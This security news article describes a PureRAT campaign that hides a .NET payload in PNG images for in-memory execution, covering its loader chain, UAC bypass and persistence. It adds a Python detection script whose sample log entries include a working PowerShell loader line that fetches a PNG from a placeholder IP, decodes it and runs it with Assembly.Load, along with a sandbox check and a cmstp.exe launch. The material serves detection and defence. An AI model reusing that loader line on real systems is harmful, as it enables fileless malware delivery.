Stealthy PureRAT Malware Campaign Conceals Payloads in PNG Images for Fileless Execution
A newly identified malware campaign is leveraging the PureRAT remote access trojan (RAT) to infiltrate Windows systems by embedding malicious code within seemingly innocuous PNG image files. This sophisticated method allows the malware to execute directly in memory, leaving minimal traces on disk and evading traditional security measures.
Infection Chain Overview
The attack initiates with a deceptive Windows shortcut file (.lnk) that, when opened, triggers a concealed PowerShell command. This command reaches out to a remote server to download a PNG image containing a Base64-encoded portable executable (PE) file hidden through steganography. To the user, the image appears normal, but it secretly harbors the malicious payload.
Security researchers at Trellix have analyzed this campaign, highlighting the multi-layered obfuscation techniques employed. The PowerShell script used in the second stage is heavily obfuscated, incorporating extraneous data to mislead analysis tools. Additionally, the malware checks for virtualized environments like VMware and QEMU, terminating itself if such conditions are detected to avoid sandbox analysis.
Execution and Persistence Mechanisms
Once activated, PureRAT conducts host fingerprinting to gather information on installed security software, hardware identifiers, and user privileges. It bypasses User Account Control (UAC) using cmstp.exe and employs process hollowing to inject malicious code into the legitimate msbuild.exe process, allowing it to operate under the guise of a trusted Windows component.
The malware establishes a connection to a command-and-control (C2) server, enabling operators to deploy additional modules for keylogging, system monitoring, or remote desktop access. To maintain persistence, PureRAT creates a scheduled task within the Windows registry, ensuring it re-executes upon system startup.
Technical Details of the Infection Mechanism
The core technique involves embedding the malicious payload within a PNG image file. After the initial .lnk file triggers the hidden PowerShell command, the script downloads the PNG from the attacker’s server. This image contains a Base64-encoded PE file concealed within its data. The script identifies the payload’s start and end markers, extracts the encoded data, performs character replacements, reverses the data, decodes it from Base64, and converts it into a byte array.
This byte array is then loaded directly into memory as a compiled .NET assembly using System.Reflection.Assembly.Load(). All malicious operations occur within the PowerShell process’s memory space, leaving the original msbuild.exe binary on disk untouched and maintaining its status as a signed, legitimate Windows file. This approach effectively evades file-based detection mechanisms.
The .NET DLL embedded within the PNG serves as the next-stage loader, protected by .NET Reactor obfuscation. Its Main function invokes a Triple DES decryption routine, sourcing the key and initialization vector from Base64-encoded strings within the file.
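As an added illustration (not code from the Trellix analysis or from the campaign itself), the following Python script runs simple detection logic over constructed PowerShell script-block log entries, flagging the combination of behaviours described above: an image download, Base64 decoding, string reversal, character replacement and an in-memory Assembly.Load, plus the VMware/QEMU check and the cmstp.exe launch. The sample entries, indicator names and scoring thresholds are assumptions made for the example.

```python
import re

# Constructed sample PowerShell script-block log bodies (Event ID 4104) for
# demonstration only; they are not captured from the campaign described above.
SAMPLE_SCRIPT_BLOCKS = [
    # Benign: an administrator fetching an image for an intranet page.
    "Invoke-WebRequest -Uri 'https://intranet.example/logo.png' -OutFile C:\\web\\logo.png",
    # Mirrors the loader behaviour described in the text: image download, marker
    # slicing, character replacement, reversal, Base64 decode, in-memory load.
    "$r=Invoke-WebRequest 'http://203.0.113.5/pic.png';"
    "$d=[Text.Encoding]::ASCII.GetString($r.Content);"
    "$p=$d.Substring($d.IndexOf('<<')+2,$d.IndexOf('>>')-$d.IndexOf('<<')-2) -replace '#','=';"
    "$p=-join $p[-1..-$p.Length];$b=[Convert]::FromBase64String($p);"
    "[System.Reflection.Assembly]::Load($b)",
    # Sandbox check followed by a cmstp.exe launch.
    "if((Get-WmiObject Win32_ComputerSystem).Model -match 'VMware|QEMU'){exit};Start-Process cmstp.exe",
]

# Each indicator is a name plus a compiled pattern; the names are our own labels.
INDICATORS = {
    "image_download": re.compile(r"(Invoke-WebRequest|DownloadData|DownloadString|Net\.WebClient).*\.png", re.I),
    "base64_decode": re.compile(r"FromBase64String", re.I),
    "string_reversal": re.compile(r"\[-1\.\.-|\[array\]::Reverse", re.I),
    "char_replacement": re.compile(r"-replace\s|\.Replace\(", re.I),
    "reflective_assembly_load": re.compile(r"Reflection\.Assembly\]::Load\(", re.I),
    "vm_check": re.compile(r"VMware|QEMU", re.I),
    "cmstp_launch": re.compile(r"cmstp\.exe", re.I),
    "msbuild_reference": re.compile(r"msbuild\.exe", re.I),
}
# Indicators that warrant a flag on their own; the rest only count in combination.
HIGH_CONFIDENCE = {"reflective_assembly_load", "cmstp_launch"}


def analyze_script_block(text: str) -> dict:
    """Return the indicator names matched in one script block and a verdict."""
    hits = [name for name, pat in INDICATORS.items() if pat.search(text)]
    suspicious = bool(HIGH_CONFIDENCE & set(hits)) or len(hits) >= 3
    return {"indicators": hits, "suspicious": suspicious}


def triage(blocks) -> list:
    """Analyse a batch of script blocks and return only the flagged ones."""
    results = [dict(index=i, **analyze_script_block(b)) for i, b in enumerate(blocks)]
    return [r for r in results if r["suspicious"]]


if __name__ == "__main__":
    for hit in triage(SAMPLE_SCRIPT_BLOCKS):
        print(f"block {hit['index']}: {', '.join(hit['indicators'])}")
```

The benign download is left alone because a single indicator is not enough on its own; the threshold and the high-confidence set are the knobs to tune against your own script-block logging volume.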
Implications and Recommendations
This campaign underscores the evolving tactics of cybercriminals who are increasingly adopting fileless malware techniques to evade detection. By embedding payloads within image files and executing them directly in memory, attackers can bypass traditional security solutions that rely on file-based scanning.
To mitigate such threats, organizations should:
– Enhance Endpoint Detection and Response (EDR) Capabilities: Implement solutions that monitor for suspicious behavior in memory and detect anomalies associated with fileless malware.
– Educate Users on Phishing Tactics: Train employees to recognize and avoid suspicious emails and attachments, as social engineering remains a primary vector for malware delivery.
– Regularly Update Security Software: Ensure that all security tools are up-to-date to recognize and respond to the latest threats.
– Implement Network Segmentation: Limit the spread of malware by segmenting networks and restricting access to critical systems.
By adopting a multi-layered security approach and staying informed about emerging threats, organizations can better defend against sophisticated malware campaigns like the one involving PureRAT.